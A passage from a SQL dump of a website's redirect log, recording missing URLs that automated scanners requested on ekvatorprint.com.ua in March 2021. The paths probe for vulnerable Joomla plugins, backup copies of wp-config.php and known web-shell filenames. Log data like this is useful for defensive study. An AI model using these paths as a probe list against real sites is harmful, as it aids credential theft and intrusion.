13:57:21','0000-00-00 00:00:00',301),(19677,'https://ekvatorprint.com.ua/components/com_fss',NULL,'','',1,0,'2021-03-01 13:57:21','0000-00-00 00:00:00',301),(19678,'https://ekvatorprint.com.ua/components/com_zimbcore',NULL,'','',1,0,'2021-03-01 13:57:21','0000-00-00 00:00:00',301),(19679,'https://ekvatorprint.com.ua/components/com_awiki',NULL,'','',1,0,'2021-03-01 13:57:21','0000-00-00 00:00:00',301),(19680,'https://ekvatorprint.com.ua/components/com_rapidrecipe',NULL,'','',1,0,'2021-03-01 13:57:22','0000-00-00 00:00:00',301),(19681,'https://ekvatorprint.com.ua/components/com_pro',NULL,'','',1,0,'2021-03-01 13:57:22','0000-00-00 00:00:00',301),(19682,'https://ekvatorprint.com.ua/components/com_turtushout',NULL,'','',1,0,'2021-03-01 13:57:22','0000-00-00 00:00:00',301),(19683,'https://ekvatorprint.com.ua/components/com_advert',NULL,'','',1,0,'2021-03-01 13:57:22','0000-00-00 00:00:00',301),(19684,'https://ekvatorprint.com.ua/components/com_acymailing',NULL,'','',1,0,'2021-03-01 13:57:23','0000-00-00 00:00:00',301),(19685,'https://ekvatorprint.com.ua/components/com_jeeventcalendar',NULL,'','',1,0,'2021-03-01 13:57:23','0000-00-00 00:00:00',301),(19686,'https://ekvatorprint.com.ua/components/com_dcs_flashgames',NULL,'','',1,0,'2021-03-01 13:57:23','0000-00-00 00:00:00',301),(19687,'https://ekvatorprint.com.ua/components/com_car',NULL,'','',1,0,'2021-03-01 13:57:23','0000-00-00 00:00:00',301),(19688,'https://ekvatorprint.com.ua/components/com_pollxt',NULL,'','',1,0,'2021-03-01 13:57:24','0000-00-00 00:00:00',301),(19689,'https://ekvatorprint.com.ua/components/com_odudeprofile',NULL,'','',1,0,'2021-03-01 13:57:24','0000-00-00 00:00:00',301),(19690,'https://ekvatorprint.com.ua/components/com_forum',NULL,'','',1,0,'2021-03-01 13:57:24','0000-00-00 00:00:00',301),(19691,'https://ekvatorprint.com.ua/components/com_gcalendar',NULL,'','',1,0,'2021-03-01 13:57:24','0000-00-00 00:00:00',301),(19692,'https://ekvatorprint.com.ua/components/com_onisquotes',NULL,'','',1,0,'2021-03-01 13:57:25','0000-00-00 00:00:00',301),(19693,'https://ekvatorprint.com.ua/components/com_team',NULL,'','',1,0,'2021-03-01 13:57:25','0000-00-00 00:00:00',301),(19694,'https://ekvatorprint.com.ua/components/com_contactinfo',NULL,'','',1,0,'2021-03-01 13:57:25','0000-00-00 00:00:00',301),(19695,'https://ekvatorprint.com.ua/components/com_custompages',NULL,'','',1,0,'2021-03-01 13:57:25','0000-00-00 00:00:00',301),(19696,'https://ekvatorprint.com.ua/components/com_gurujibook',NULL,'','',1,0,'2021-03-01 13:57:25','0000-00-00 00:00:00',301),(19697,'https://ekvatorprint.com.ua/components/com_realtyna',NULL,'','',1,0,'2021-03-01 13:57:26','0000-00-00 00:00:00',301),(19698,'https://ekvatorprint.com.ua/components/com_svmap',NULL,'','',1,0,'2021-03-01 13:57:26','0000-00-00 00:00:00',301),(19699,'https://ekvatorprint.com.ua/components/com_a6mambocredits',NULL,'','',1,0,'2021-03-01 13:57:26','0000-00-00 00:00:00',301),(19700,'https://ekvatorprint.com.ua/components/com_alberghi',NULL,'','',1,0,'2021-03-01 13:57:26','0000-00-00 00:00:00',301),(19701,'https://ekvatorprint.com.ua/components/com_spiderfacebook',NULL,'','',1,0,'2021-03-01 13:57:27','0000-00-00 00:00:00',301),(19702,'https://ekvatorprint.com.ua/components/com_casino',NULL,'','',1,0,'2021-03-01 13:57:27','0000-00-00 00:00:00',301),(19703,'https://ekvatorprint.com.ua/components/com_cincopa',NULL,'','',1,0,'2021-03-01 13:57:27','0000-00-00 00:00:00',301),(19704,'https://ekvatorprint.com.ua/components/com_kunena',NULL,'','',1,0,'2021-03-01 13:57:27','0000-00-00 00:00:00',301),(19705,'https://ekvatorprint.com.ua/components/com_jgen',NULL,'','',1,0,'2021-03-01 13:57:27','0000-00-00 00:00:00',301),(19706,'https://ekvatorprint.com.ua/components/com_ignitegallery',NULL,'','',1,0,'2021-03-01 13:57:28','0000-00-00 00:00:00',301),(19707,'https://ekvatorprint.com.ua/components/com_bookflip',NULL,'','',1,0,'2021-03-01 13:57:28','0000-00-00 00:00:00',301),(19708,'https://ekvatorprint.com.ua/components/com_userstatus',NULL,'','',1,0,'2021-03-01 13:57:28','0000-00-00 00:00:00',301),(19709,'https://ekvatorprint.com.ua/components/com_jeportfolio',NULL,'','',1,0,'2021-03-01 13:57:29','0000-00-00 00:00:00',301),(19710,'https://ekvatorprint.com.ua/components/com_listbingo',NULL,'','',1,0,'2021-03-01 13:57:29','0000-00-00 00:00:00',301),(19711,'https://ekvatorprint.com.ua/components/com_simplemembership',NULL,'','',1,0,'2021-03-01 13:57:29','0000-00-00 00:00:00',301),(19712,'https://ekvatorprint.com.ua/components/com_smartshoutbox',NULL,'','',1,0,'2021-03-01 13:57:29','0000-00-00 00:00:00',301),(19713,'https://ekvatorprint.com.ua/components/com_photo',NULL,'','',1,0,'2021-03-01 13:57:30','0000-00-00 00:00:00',301),(19714,'https://ekvatorprint.com.ua/components/com_pandafminigames',NULL,'','',1,0,'2021-03-01 13:57:30','0000-00-00 00:00:00',301),(19715,'https://ekvatorprint.com.ua/components/com_nicetalk',NULL,'','',1,0,'2021-03-01 13:57:30','0000-00-00 00:00:00',301),(19716,'https://ekvatorprint.com.ua/components/com_zoom',NULL,'','',1,0,'2021-03-01 13:57:30','0000-00-00 00:00:00',301),(19717,'https://ekvatorprint.com.ua/components/com_hezacontent',NULL,'','',1,0,'2021-03-01 13:57:31','0000-00-00 00:00:00',301),(19718,'https://ekvatorprint.com.ua/components/com_candle',NULL,'','',1,0,'2021-03-01 13:57:31','0000-00-00 00:00:00',301),(19719,'https://ekvatorprint.com.ua/components/com_bbs',NULL,'','',1,0,'2021-03-01 13:57:31','0000-00-00 00:00:00',301),(19720,'https://ekvatorprint.com.ua/components/com_dailymeals',NULL,'','',1,0,'2021-03-01 13:57:31','0000-00-00 00:00:00',301),(19721,'https://ekvatorprint.com.ua/wp-includes/css/wp-config.php',NULL,'ekvatorprint.com.ua','',35,0,'2021-03-01 14:29:25','0000-00-00 00:00:00',301),(19722,'https://ekvatorprint.com.ua/wp-admin/user/wp-config.php',NULL,'ekvatorprint.com.ua','',1,0,'2021-03-01 14:30:01','0000-00-00 00:00:00',301),(19723,'https://ekvatorprint.com.ua/wp-includes/config.bak.php',NULL,'ekvatorprint.com.ua','',20,0,'2021-03-01 14:32:27','0000-00-00 00:00:00',301),(19724,'https://ekvatorprint.com.ua/js/extjs.php?test=hello',NULL,'','',1,0,'2021-03-02 10:44:23','0000-00-00 00:00:00',301),(19725,'https://ekvatorprint.com.ua/plugins/jshopping/jquery_file_upload/server/php/index.php',NULL,'http://www.google.com/','',1,0,'2021-03-08 02:17:02','0000-00-00 00:00:00',301),(19726,'https://ekvatorprint.com.ua/store/admin',NULL,'','',5,0,'2021-03-11 08:41:43','0000-00-00 00:00:00',301),(19727,'https://ekvatorprint.com.ua/shop/admin',NULL,'','',5,0,'2021-03-11 08:41:53','0000-00-00 00:00:00',301),(19728,'https://ekvatorprint.com.ua/components/com_acying/inc/openflash/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',1,0,'2021-03-13 13:41:12','0000-00-00 00:00:00',301),(19729,'https://ekvatorprint.com.ua/wp-admin/upgrade.php',NULL,'','',1,0,'2021-03-14 08:35:48','0000-00-00 00:00:00',301),(19730,'https://ekvatorprint.com.ua/wp-config.good',NULL,'http://ekvatorprint.com.ua/wp-config.good','',2,0,'2021-03-16 03:08:42','0000-00-00 00:00:00',301),(19731,'https://ekvatorprint.com.ua/wp-config-good',NULL,'http://ekvatorprint.com.ua/wp-config-good','',2,0,'2021-03-16 03:08:42','0000-00-00 00:00:00',301),(19732,'https://ekvatorprint.com.ua/wp-config.php.cust',NULL,'http://ekvatorprint.com.ua/wp-config.php.cust','',2,0,'2021-03-16 03:08:43','0000-00-00 00:00:00',301),(19733,'https://ekvatorprint.com.ua/wp-config.php.bak1',NULL,'http://ekvatorprint.com.ua/wp-config.php.bak1','',2,0,'2021-03-16 03:08:43','0000-00-00 00:00:00',301),(19734,'https://ekvatorprint.com.ua/wp-config.php.swo',NULL,'http://ekvatorprint.com.ua/wp-config.php.swo','',2,0,'2021-03-16 03:08:43','0000-00-00 00:00:00',301),(19735,'https://ekvatorprint.com.ua/wp-config.php_bak',NULL,'http://ekvatorprint.com.ua/wp-config.php_bak','',4,0,'2021-03-16 03:08:43','0000-00-00 00:00:00',301),(19736,'https://ekvatorprint.com.ua/wp-config.php_1',NULL,'http://ekvatorprint.com.ua/wp-config.php_1','',2,0,'2021-03-16 03:08:43','0000-00-00 00:00:00',301),(19737,'https://ekvatorprint.com.ua/wp-config_good',NULL,'http://ekvatorprint.com.ua/wp-config_good','',2,0,'2021-03-16 03:08:43','0000-00-00 00:00:00',301),(19738,'https://ekvatorprint.com.ua/wp-config.php-bak',NULL,'http://ekvatorprint.com.ua/wp-config.php-bak','',2,0,'2021-03-16 03:08:43','0000-00-00 00:00:00',301),(19739,'https://ekvatorprint.com.ua/wp-config.php_new',NULL,'http://ekvatorprint.com.ua/wp-config.php_new','',3,0,'2021-03-16 03:08:43','0000-00-00 00:00:00',301),(19740,'https://ekvatorprint.com.ua/wp-config.php_old',NULL,'http://ekvatorprint.com.ua/wp-config.php_Old','',2,0,'2021-03-16 03:08:44','0000-00-00 00:00:00',301),(19741,'https://ekvatorprint.com.ua/wp-config.php.swn',NULL,'http://ekvatorprint.com.ua/wp-config.php.swn','',2,0,'2021-03-16 03:08:44','0000-00-00 00:00:00',301),(19742,'https://ekvatorprint.com.ua/wp-config.php.2',NULL,'http://ekvatorprint.com.ua/wp-config.php.2','',2,0,'2021-03-16 03:08:51','0000-00-00 00:00:00',301),(19743,'https://ekvatorprint.com.ua/wp/wp-admin/admin-ajax.php?action=heartbeat',NULL,'','',1,0,'2021-03-17 20:28:18','0000-00-00 00:00:00',301),(19744,'https://ekvatorprint.com.ua/wordpress/wp-admin/admin-ajax.php?action=heartbeat',NULL,'','',1,0,'2021-03-17 20:28:18','0000-00-00 00:00:00',301),(19745,'https://ekvatorprint.com.ua/blog/wp-admin/admin-ajax.php?action=heartbeat',NULL,'','',1,0,'2021-03-17 20:28:18','0000-00-00 00:00:00',301),(19746,'https://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/tooltip.js',NULL,'http://www.google.com/','',2,0,'2021-03-18 03:16:01','0000-00-00 00:00:00',301),(19747,'https://ekvatorprint.com.ua/opencart/admin',NULL,'','',2,0,'2021-03-18 15:04:32','0000-00-00 00:00:00',301),(19748,'https://ekvatorprint.com.ua/www.googleadservices.com/pagead/conversion.js',NULL,'','',1,0,'2021-03-18 23:06:32','0000-00-00 00:00:00',301),(19749,'https://ekvatorprint.com.ua/simplet.php',NULL,'http://ekvatorprint.com.ua/simplet.php','',2,0,'2021-03-19 12:55:59','0000-00-00 00:00:00',301),(19750,'https://ekvatorprint.com.ua/templates/beez/404.php',NULL,'http://ekvatorprint.com.ua/templates/beez/404.php','',1,0,'2021-03-19 17:16:34','0000-00-00 00:00:00',301),(19751,'https://ekvatorprint.com.ua/wp-config-samsples.php',NULL,'http://ekvatorprint.com.ua/wp-config-samsples.php','',3,0,'2021-03-19 17:22:18','0000-00-00 00:00:00',301),(19752,'https://ekvatorprint.com.ua/errors/404.php',NULL,'http://ekvatorprint.com.ua/errors/404.php','',5,0,'2021-03-19 17:24:19','0000-00-00 00:00:00',301),(19753,'https://ekvatorprint.com.ua/ini.php',NULL,'http://ekvatorprint.com.ua/ini.php','',3,0,'2021-03-19 18:47:15','0000-00-00 00:00:00',301),(19754,'https://ekvatorprint.com.ua/wp-admin.php',NULL,'http://ekvatorprint.com.ua/wp-admin.php','',12,0,'2021-03-19 19:04:02','0000-00-00 00:00:00',301),(19755,'https://ekvatorprint.com.ua/__media__/js/netsoltrademark.php?d=google.com',NULL,'','',2,0,'2021-03-19 19:30:12','0000-00-00 00:00:00',301),(19756,'https://ekvatorprint.com.ua/post.php',NULL,'http://ekvatorprint.com.ua/post.php','',3,0,'2021-03-20 00:49:48','0000-00-00 00:00:00',301),(19757,'https://ekvatorprint.com.ua/skin/htaccess.php',NULL,'http://ekvatorprint.com.ua/skin/htaccess.php','',2,0,'2021-03-20 01:03:03','0000-00-00 00:00:00',301),(19758,'https://ekvatorprint.com.ua/file.php',NULL,'http://ekvatorprint.com.ua/file.php','',5,0,'2021-03-20 01:18:38','0000-00-00 00:00:00',301),(19759,'https://ekvatorprint.com.ua/modules/mod_ppc_simple_spotlight/img/hat.php.gif?hat=1',NULL,'http://www.google.com/','',1,0,'2021-03-20 02:43:55','0000-00-00 00:00:00',301),(19760,'https://ekvatorprint.com.ua/lsn_an.php|root',NULL,'http://ekvatorprint.com.ua/lsn_an.php|root','',2,0,'2021-03-20 06:30:38','0000-00-00 00:00:00',301),(19761,'https://ekvatorprint.com.ua/wp-plugins.php.suspected',NULL,'http://ekvatorprint.com.ua/wp-plugins.php.suspected','',2,0,'2021-03-20 08:34:04','0000-00-00 00:00:00',301),(19762,'https://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php',NULL,'http://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php','',1,0,'2021-03-20 09:29:36','0000-00-00 00:00:00',301),(19763,'https://ekvatorprint.com.ua/skin/test.php',NULL,'http://ekvatorprint.com.ua/skin/test.php','',4,0,'2021-03-20 09:36:07','0000-00-00 00:00:00',301),(19764,'https://ekvatorprint.com.ua/res.php.suspected',NULL,'http://ekvatorprint.com.ua/res.php.suspected','',3,0,'2021-03-20 10:55:36','0000-00-00 00:00:00',301),(19765,'https://ekvatorprint.com.ua/skin/ini.php',NULL,'http://ekvatorprint.com.ua/skin/ini.php','',3,0,'2021-03-20 13:10:11','0000-00-00 00:00:00',301),(19766,'https://ekvatorprint.com.ua/sitemap.php',NULL,'http://ekvatorprint.com.ua/sitemap.php','',3,0,'2021-03-20 13:32:29','0000-00-00 00:00:00',301),(19767,'https://ekvatorprint.com.ua/qw.php',NULL,'http://ekvatorprint.com.ua/qw.php','',2,0,'2021-03-20 14:46:39','0000-00-00 00:00:00',301),(19768,'https://ekvatorprint.com.ua/check.php',NULL,'http://ekvatorprint.com.ua/check.php','',1,0,'2021-03-20 15:45:02','0000-00-00 00:00:00',301),(19769,'https://ekvatorprint.com.ua/class-wp-widget-archives.php',NULL,'http://ekvatorprint.com.ua/class-wp-widget-archives.php','',5,0,'2021-03-20 17:33:43','0000-00-00 00:00:00',301),(19770,'https://ekvatorprint.com.ua/media/cron.php',NULL,'http://ekvatorprint.com.ua/media/cron.php','',1,0,'2021-03-20 17:40:45','0000-00-00 00:00:00',301),(19771,'https://ekvatorprint.com.ua/cc.php',NULL,'http://ekvatorprint.com.ua/cc.php','',1,0,'2021-03-20 18:26:12','0000-00-00 00:00:00',301),(19772,'https://ekvatorprint.com.ua/media/error.php',NULL,'http://ekvatorprint.com.ua/media/error.php','',1,0,'2021-03-20 19:02:11','0000-00-00 00:00:00',301),(19773,'https://ekvatorprint.com.ua/aindex.php',NULL,'http://ekvatorprint.com.ua/aindex.php','',2,0,'2021-03-20 19:17:55','0000-00-00 00:00:00',301),(19774,'https://ekvatorprint.com.ua/nrw4vc.php',NULL,'http://ekvatorprint.com.ua/nrw4vc.php','',3,0,'2021-03-20 19:22:44','0000-00-00 00:00:00',301),(19775,'https://ekvatorprint.com.ua/wp-form-ajax.php.suspected',NULL,'http://ekvatorprint.com.ua/wp-form-ajax.php.suspected','',1,0,'2021-03-20 20:22:23','0000-00-00 00:00:00',301),(19776,'https://ekvatorprint.com.ua/cache/beence.php',NULL,'http://ekvatorprint.com.ua/cache/beence.php','',1,0,'2021-03-20 20:41:05','0000-00-00 00:00:00',301),(19777,'https://ekvatorprint.com.ua/js/m.php',NULL,'http://ekvatorprint.com.ua/js/m.php','',1,0,'2021-03-20 20:58:46','0000-00-00 00:00:00',301),(19778,'https://ekvatorprint.com.ua/media/inc.php',NULL,'http://ekvatorprint.com.ua/media/inc.php','',1,0,'2021-03-20 21:10:39','0000-00-00 00:00:00',301),(19779,'https://ekvatorprint.com.ua/js/info.php',NULL,'http://ekvatorprint.com.ua/js/info.php','',2,0,'2021-03-20 22:14:18','0000-00-00 00:00:00',301),(19780,'https://ekvatorprint.com.ua/media/test.php',NULL,'http://ekvatorprint.com.ua/media/test.php','',1,0,'2021-03-20 22:41:56','0000-00-00 00:00:00',301),(19781,'https://ekvatorprint.com.ua/prefix.php',NULL,'http://ekvatorprint.com.ua/prefix.php','',1,0,'2021-03-20 22:43:50','0000-00-00 00:00:00',301),(19782,'https://ekvatorprint.com.ua/class-widget-archives.php',NULL,'http://ekvatorprint.com.ua/class-widget-archives.php','',5,0,'2021-03-20 22:54:36','0000-00-00 00:00:00',301),(19783,'https://ekvatorprint.com.ua/media/sitemap.php',NULL,'http://ekvatorprint.com.ua/media/sitemap.php','',1,0,'2021-03-21 00:05:30','0000-00-00 00:00:00',301),(19784,'https://ekvatorprint.com.ua/errors/m.php',NULL,'http://ekvatorprint.com.ua/errors/m.php','',1,0,'2021-03-21 00:15:01','0000-00-00 00:00:00',301),(19785,'https://ekvatorprint.com.ua/media/mini.php',NULL,'http://ekvatorprint.com.ua/media/mini.php','',2,0,'2021-03-21 01:18:44','0000-00-00 00:00:00',301),(19786,'https://ekvatorprint.com.ua/errors/log.php',NULL,'http://ekvatorprint.com.ua/errors/log.php','',1,0,'2021-03-21 01:53:47','0000-00-00 00:00:00',301),(19787,'https://ekvatorprint.com.ua/modules/mod_artuploader/js/ajaxupload.js',NULL,'http://www.google.com/','',1,0,'2021-03-21 03:28:09','0000-00-00 00:00:00',301),(19788,'https://ekvatorprint.com.ua/rxr__lrndqpbzfs.php',NULL,'http://ekvatorprint.com.ua/RxR__lrndqpbzfs.php','',1,0,'2021-03-21 03:29:47','0000-00-00 00:00:00',301),(19789,'https://ekvatorprint.com.ua/wp-logout.php.suspected',NULL,'http://ekvatorprint.com.ua/wp-logout.php.suspected','',1,0,'2021-03-21 03:41:36','0000-00-00 00:00:00',301),(19790,'https://ekvatorprint.com.ua/content-post.php|root',NULL,'http://ekvatorprint.com.ua/content-post.php|root','',1,0,'2021-03-21 05:04:50','0000-00-00 00:00:00',301),(19791,'https://ekvatorprint.com.ua/ngopo.php',NULL,'http://ekvatorprint.com.ua/ngopo.php','',2,0,'2021-03-21 06:26:52','0000-00-00 00:00:00',301),(19792,'https://ekvatorprint.com.ua/load.php',NULL,'http://ekvatorprint.com.ua/load.php','',3,0,'2021-03-21 07:12:51','0000-00-00 00:00:00',301),(19793,'https://ekvatorprint.com.ua/wso1.php',NULL,'http://ekvatorprint.com.ua/wso1.php','',6,0,'2021-03-21 07:55:41','0000-00-00 00:00:00',301),(19794,'https://ekvatorprint.com.ua/xm1rpe.php',NULL,'http://ekvatorprint.com.ua/xm1rpe.php','',1,0,'2021-03-21 08:16:26','0000-00-00 00:00:00',301),(19795,'https://ekvatorprint.com.ua/media/a.php',NULL,'http://ekvatorprint.com.ua/media/a.php','',1,0,'2021-03-21 08:18:55','0000-00-00 00:00:00',301),(19796,'https://ekvatorprint.com.ua/media/yusa.php',NULL,'http://ekvatorprint.com.ua/media/yusa.php','',2,0,'2021-03-21 09:38:48','0000-00-00 00:00:00',301),(19797,'https://ekvatorprint.com.ua/beence.php',NULL,'http://ekvatorprint.com.ua/beence.php','',17,0,'2021-03-21 09:52:43','0000-00-00 00:00:00',301),(19798,'https://ekvatorprint.com.ua/librareis.php',NULL,'http://ekvatorprint.com.ua/librareis.php','',1,0,'2021-03-21 10:03:04','0000-00-00 00:00:00',301),(19799,'https://ekvatorprint.com.ua/lasa.php',NULL,'http://ekvatorprint.com.ua/lasa.php','',1,0,'2021-03-21 10:10:31','0000-00-00 00:00:00',301),(19800,'https://ekvatorprint.com.ua/media/check.php',NULL,'http://ekvatorprint.com.ua/media/check.php','',2,0,'2021-03-21 12:27:45','0000-00-00 00:00:00',301),(19801,'https://ekvatorprint.com.ua/bitrix/admin/ups.php',NULL,'http://ekvatorprint.com.ua/bitrix/admin/ups.php','',3,0,'2021-03-21 13:03:29','0000-00-00 00:00:00',301),(19802,'https://ekvatorprint.com.ua/media/alfa.php',NULL,'http://ekvatorprint.com.ua/media/alfa.php','',1,0,'2021-03-21 13:31:59','0000-00-00 00:00:00',301),(19803,'https://ekvatorprint.com.ua/includes/d.php',NULL,'http://ekvatorprint.com.ua/includes/d.php','',1,0,'2021-03-21 13:35:51','0000-00-00 00:00:00',301),(19804,'https://ekvatorprint.com.ua/bin/logo_img.php',NULL,'http://ekvatorprint.com.ua/bin/logo_img.php','',1,0,'2021-03-21 14:08:31','0000-00-00 00:00:00',301),(19805,'https://ekvatorprint.com.ua/media/doc.php',NULL,'http://ekvatorprint.com.ua/media/doc.php','',1,0,'2021-03-21 14:23:26','0000-00-00 00:00:00',301),(19806,'https://ekvatorprint.com.ua/media/readme.php',NULL,'http://ekvatorprint.com.ua/media/readme.php','',1,0,'2021-03-21 14:36:52','0000-00-00 00:00:00',301),(19807,'https://ekvatorprint.com.ua/media/data.php',NULL,'http://ekvatorprint.com.ua/media/data.php','',1,0,'2021-03-21 15:01:31','0000-00-00 00:00:00',301),(19808,'https://ekvatorprint.com.ua/media/ups.php',NULL,'http://ekvatorprint.com.ua/media/ups.php','',1,0,'2021-03-21 15:15:38','0000-00-00 00:00:00',301),(19809,'https://ekvatorprint.com.ua/media/post.php',NULL,'http://ekvatorprint.com.ua/media/post.php','',1,0,'2021-03-21 16:06:05','0000-00-00 00:00:00',301),(19810,'https://ekvatorprint.com.ua/shop/cron.php',NULL,'http://ekvatorprint.com.ua/shop//cron.php','',1,0,'2021-03-21 16:08:19','0000-00-00 00:00:00',301),(19811,'https://ekvatorprint.com.ua/media/index2.php',NULL,'http://ekvatorprint.com.ua/media/index2.php','',1,0,'2021-03-21 17:02:40','0000-00-00 00:00:00',301),(19812,'https://ekvatorprint.com.ua/dlhqs.php',NULL,'http://ekvatorprint.com.ua/dlhqs.php','',4,0,'2021-03-21 17:33:46','0000-00-00 00:00:00',301),(19813,'https://ekvatorprint.com.ua/js/index2.php',NULL,'http://ekvatorprint.com.ua/js/index2.php','',2,0,'2021-03-21 17:41:40','0000-00-00 00:00:00',301),(19814,'https://ekvatorprint.com.ua/wawa.php',NULL,'http://ekvatorprint.com.ua/wawa.php','',1,0,'2021-03-21 17:55:34','0000-00-00 00:00:00',301),(19815,'https://ekvatorprint.com.ua/media/log.php',NULL,'http://ekvatorprint.com.ua/media/log.php','',1,0,'2021-03-21 18:40:26','0000-00-00 00:00:00',301),(19816,'https://ekvatorprint.com.ua/tmp/sfx.php',NULL,'http://ekvatorprint.com.ua/tmp/sfx.php','',3,0,'2021-03-21 19:14:35','0000-00-00 00:00:00',301),(19817,'https://ekvatorprint.com.ua/owl.php',NULL,'http://ekvatorprint.com.ua/owl.php','',1,0,'2021-03-21 21:57:53','0000-00-00 00:00:00',301),(19818,'https://ekvatorprint.com.ua/cache/list.php',NULL,'http://ekvatorprint.com.ua/cache/list.php','',1,0,'2021-03-21 22:04:23','0000-00-00 00:00:00',301),(19819,'https://ekvatorprint.com.ua/media/media-admin.php',NULL,'http://ekvatorprint.com.ua/media/media-admin.php','',2,0,'2021-03-22 04:24:10','0000-00-00 00:00:00',301),(19820,'https://ekvatorprint.com.ua/old/aspnet_client/.5ebff.php.suspected',NULL,'http://ekvatorprint.com.ua/old/aspnet_client/.5ebff.php.suspected','',1,0,'2021-03-22 05:31:49','0000-00-00 00:00:00',301),(19821,'https://ekvatorprint.com.ua/media/config.php',NULL,'http://ekvatorprint.com.ua/media/config.php','',1,0,'2021-03-22 06:27:49','0000-00-00 00:00:00',301),(19822,'https://ekvatorprint.com.ua/components/com_search/models/mide.php',NULL,'http://ekvatorprint.com.ua/components/com_search/models/mide.php','',4,0,'2021-03-22 06:59:35','0000-00-00 00:00:00',301),(19823,'https://ekvatorprint.com.ua/hexhglal.php',NULL,'http://ekvatorprint.com.ua/hexhglal.php','',1,0,'2021-03-22 10:19:03','0000-00-00 00:00:00',301),(19824,'https://ekvatorprint.com.ua/farmtoyourhome.in/docindex.php',NULL,'http://ekvatorprint.com.ua/farmtoyourhome.in/docindex.php','',1,0,'2021-03-22 11:27:06','0000-00-00 00:00:00',301),(19825,'https://ekvatorprint.com.ua/dejanos-tu-cv/mailattach.php',NULL,'http://ekvatorprint.com.ua/dejanos-tu-cv/mailattach.php','',1,0,'2021-03-22 14:12:28','0000-00-00 00:00:00',301),(19826,'https://ekvatorprint.com.ua/modules/mod_roknavmenu/themes/default/index.php',NULL,'http://ekvatorprint.com.ua/modules/mod_roknavmenu/themes/default/index.php','',1,0,'2021-03-22 14:32:47','0000-00-00 00:00:00',301),(19827,'https://ekvatorprint.com.ua/components/com_content/helpers/images.php',NULL,'http://ekvatorprint.com.ua/components/com_content/helpers/images.php','',3,0,'2021-03-22 18:55:21','0000-00-00 00:00:00',301),(19828,'https://ekvatorprint.com.ua/components/com_banners/docindex.php',NULL,'http://ekvatorprint.com.ua/components/com_banners/docindex.php','',1,0,'2021-03-22 20:18:28','0000-00-00 00:00:00',301),(19829,'https://ekvatorprint.com.ua/images/headers/theme.php',NULL,'http://ekvatorprint.com.ua/images/headers/theme.php','',2,0,'2021-03-22 21:28:12','0000-00-00 00:00:00',301),(19830,'https://ekvatorprint.com.ua/olariaemcuritiba.com.br/docindex.php',NULL,'http://ekvatorprint.com.ua/olariaemcuritiba.com.br/docindex.php','',1,0,'2021-03-22 21:54:58','0000-00-00 00:00:00',301),(19831,'https://ekvatorprint.com.ua/language/404.php',NULL,'http://ekvatorprint.com.ua/language/404.php','',2,0,'2021-03-22 22:43:21','0000-00-00 00:00:00',301),(19832,'https://ekvatorprint.com.ua/plugins/system/jsnframework/libraries/joomlashine/config/htaccess.php',NULL,'http://ekvatorprint.com.ua/plugins/system/jsnframework/libraries/joomlashine/config/htaccess.php','',1,0,'2021-03-22 22:45:29','0000-00-00 00:00:00',301),(19833,'https://ekvatorprint.com.ua/templates/sitemps.php',NULL,'http://ekvatorprint.com.ua/templates/sitemps.php','',2,0,'2021-03-22 23:42:16','0000-00-00 00:00:00',301),(19834,'https://ekvatorprint.com.ua/nsgin.com/cache/doc.php',NULL,'http://ekvatorprint.com.ua/nsgin.com/cache/doc.php','',1,0,'2021-03-22 23:59:16','0000-00-00 00:00:00',301),(19835,'https://ekvatorprint.com.ua/media/sitemps.php',NULL,'http://ekvatorprint.com.ua/media/sitemps.php','',1,0,'2021-03-23 06:12:22','0000-00-00 00:00:00',301),(19836,'https://ekvatorprint.com.ua/cache/pp1.php',NULL,'http://ekvatorprint.com.ua/cache/pp1.php','',2,0,'2021-03-23 06:50:08','0000-00-00 00:00:00',301),(19837,'https://ekvatorprint.com.ua/users/sign_in',NULL,'','',5,0,'2021-03-23 06:53:09','0000-00-00 00:00:00',301),(19838,'https://ekvatorprint.com.ua/includes/sitemps.php',NULL,'http://ekvatorprint.com.ua/includes/sitemps.php','',1,0,'2021-03-23 07:46:24','0000-00-00 00:00:00',301),(19839,'https://ekvatorprint.com.ua/newagenciajm.com.mx/docindex.php',NULL,'http://ekvatorprint.com.ua/newagenciajm.com.mx/docindex.php','',1,0,'2021-03-23 10:32:56','0000-00-00 00:00:00',301),(19840,'https://ekvatorprint.com.ua/dcxw5w.php',NULL,'http://ekvatorprint.com.ua/dcxw5w.php','',1,0,'2021-03-23 10:42:54','0000-00-00 00:00:00',301),(19841,'https://ekvatorprint.com.ua/components/com_search/models/doc.php',NULL,'http://ekvatorprint.com.ua/components/com_search/models/doc.php','',3,0,'2021-03-23 10:51:02','0000-00-00 00:00:00',301),(19842,'https://ekvatorprint.com.ua/modules/pp1.php',NULL,'http://ekvatorprint.com.ua/modules/pp1.php','',1,0,'2021-03-23 11:02:44','0000-00-00 00:00:00',301),(19843,'https://ekvatorprint.com.ua/images/logo_img.php.suspected',NULL,'http://ekvatorprint.com.ua/images/logo_img.php.suspected','',1,0,'2021-03-23 11:22:22','0000-00-00 00:00:00',301),(19844,'https://ekvatorprint.com.ua/home/wp-info.php',NULL,'http://ekvatorprint.com.ua/home/wp-info.php','',1,0,'2021-03-23 11:52:17','0000-00-00 00:00:00',301),(19845,'https://ekvatorprint.com.ua/wp-config-sample.php',NULL,'http://ekvatorprint.com.ua/wp-config-sample.php','',4,0,'2021-03-23 12:28:34','0000-00-00 00:00:00',301),(19846,'https://ekvatorprint.com.ua/modules/mod_verison/nrkindex.php',NULL,'http://ekvatorprint.com.ua/modules/mod_verison/nrkindex.php','',1,0,'2021-03-23 12:30:34','0000-00-00 00:00:00',301),(19847,'https://ekvatorprint.com.ua/nsgin.com/doc.php',NULL,'http://ekvatorprint.com.ua/nsgin.com/doc.php','',1,0,'2021-03-23 12:49:22','0000-00-00 00:00:00',301),(19848,'https://ekvatorprint.com.ua/managera/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/managera/popup-pomo.php','',1,0,'2021-03-23 13:02:19','0000-00-00 00:00:00',301),(19849,'https://ekvatorprint.com.ua/sad.php',NULL,'http://ekvatorprint.com.ua/sad.php','',2,0,'2021-03-23 13:52:23','0000-00-00 